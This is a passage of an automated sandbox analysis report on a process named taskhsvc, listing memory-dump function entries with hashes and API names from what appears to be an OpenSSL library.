                                                            • Opcode ID: 81a51805c3eaa3b468c8261409b51db716483a87037387ae76c38c77965af1f8
                                                            • Instruction ID: d4f333e209292a559d973f0067123bed882b448ff7c8506a0298e7a8bef49d48
                                                            • Opcode Fuzzy Hash: 81a51805c3eaa3b468c8261409b51db716483a87037387ae76c38c77965af1f8
                                                            • Instruction Fuzzy Hash: F9E0BDB04087009ED700AF28C14434BBBF0BF84398F128C0CA8C94B750C7BEA5898F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE22C10 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: L_init
                                                            • String ID:
                                                            • API String ID: 2485848262-0
                                                            • Opcode ID: f060aed1641d7c449fe2177e5b37300ccdb9f6fb93e7305a786881d18714b58f
                                                            • Instruction ID: 3b84ab3b34cfa9cd9c4fbcf27e3769896a6d6e9ea197183f2c698f6f1eb286df
                                                            • Opcode Fuzzy Hash: f060aed1641d7c449fe2177e5b37300ccdb9f6fb93e7305a786881d18714b58f
                                                            • Instruction Fuzzy Hash: 8D31F9356146008FDB10DF25C684B5BBBF5BB99328F52891CEAA597300D734F904CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE28CB0 Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_malloc__stack_chk_faillh_doall_arglh_num_itemsqsort
                                                            • String ID:
                                                            • API String ID: 2966463834-0
                                                            • Opcode ID: 43bb805b856bf9980c6be874a29ac350522bd04dd28ef350a8f1e16e9d56232e
                                                            • Instruction ID: 34e3d3d36b4b84b15fd1235edae1c901be8b6577039087707a3d394d0db37c00
                                                            • Opcode Fuzzy Hash: 43bb805b856bf9980c6be874a29ac350522bd04dd28ef350a8f1e16e9d56232e
                                                            • Instruction Fuzzy Hash: 3821E0B55083018FC700DF69C48060BBBF4FB88358F21892EE9D887710E338E9498F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE7CDC0 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc
                                                            • String ID:
                                                            • API String ID: 1457121658-0
                                                            • Opcode ID: 83a994dbae5e1d6b152c981295c79d74a2470d47f3d45aa4c76000a4e1071a71
                                                            • Instruction ID: e24f31c43f9f7cc31a3d666d678725608ab2ff9e8da7dd358a4e332627c3b209
                                                            • Opcode Fuzzy Hash: 83a994dbae5e1d6b152c981295c79d74a2470d47f3d45aa4c76000a4e1071a71
                                                            • Instruction Fuzzy Hash: 1011F5B1514A01CBDB10EF25C98478ABBF4BF48308F52881CDA949B744E334E509CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6CDB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ASN1_STRING_type_new.LIBEAY32 ref: 6CF6CE0D
                                                              • Part of subcall function 6CF23F30: CRYPTO_malloc.LIBEAY32 ref: 6CF23F5A
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6D047
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: G_type_newO_mallocR_put_error
                                                            • String ID: A$l
                                                            • API String ID: 2512349753-1005974064
                                                            • Opcode ID: 67403571646e8b3e6e369dd821cab300231572e0fbaa72e4062e4cd34d241a7b
                                                            • Instruction ID: 56c4efb4d8a223aa541ab11dbccbcbb0f729f373a6d302f7a53d8ecf75fbd1e8
                                                            • Opcode Fuzzy Hash: 67403571646e8b3e6e369dd821cab300231572e0fbaa72e4062e4cd34d241a7b
                                                            • Instruction Fuzzy Hash: 7001E5B01093829FE720DF25C540B9BBBF4AB89308F12491DEAD887B40E375A544CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF36E80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocstrlen
                                                            • String ID: A$u
                                                            • API String ID: 3192733237-1604213488
                                                            • Opcode ID: 9430d89839acada2864f98393f292f3697e090dc071443cc3b4d6853b1c5700e
                                                            • Instruction ID: 4eedddb397774b70133058bb01fcaa9ba67a5971bbcb6d459284a3d100fb3c09
                                                            • Opcode Fuzzy Hash: 9430d89839acada2864f98393f292f3697e090dc071443cc3b4d6853b1c5700e
                                                            • Instruction Fuzzy Hash: FD0129B56197119BD7009F35C98024FBBF4AF88758F11992EE988D7710E735D8418FC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE2288C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_get_dynlock_valueOpen__stack_chk_fail
                                                            • String ID: cryptlib.c$pointer != NULL
                                                            • API String ID: 3168104378-1126093478
                                                            • Opcode ID: 7bc868406a3153b80e5c024d518734f3d760d1b1128610cb3eb6cdc9fb6bfa66
                                                            • Instruction ID: 38f3c2c78ac78db88195e9f07d8d65e51fe34a780b452616abc04980b2d4376e
                                                            • Opcode Fuzzy Hash: 7bc868406a3153b80e5c024d518734f3d760d1b1128610cb3eb6cdc9fb6bfa66
                                                            • Instruction Fuzzy Hash: B2F03771A187018BDB149F65D58435AFBF0FF81358F21881EEAA897A10C739E406DBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE54EA0 Relevance: 7.8, APIs: 5, Instructions: 305COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: C2_encrypt$__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2416772474-0
                                                            • Opcode ID: 53826052b66e63f7c3a0c8ccfe44512a8dda47d569105ffc3865fabed165bdb1
                                                            • Instruction ID: c13628da57d1184d9fa1cb1e6f35ed7d7dc754a64b2f0206dff53cd0daf4e62e
                                                            • Opcode Fuzzy Hash: 53826052b66e63f7c3a0c8ccfe44512a8dda47d569105ffc3865fabed165bdb1
                                                            • Instruction Fuzzy Hash: FBA1393520D7818FC315CF29818045BFFF1AFEA204F588A9DE9D597742D671E819CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF2F60 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • X509at_add1_attr_by_txt.LIBEAY32 ref: 6CEF2F98
                                                              • Part of subcall function 6CF3F790: OBJ_txt2obj.LIBEAY32 ref: 6CF3F7C9
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
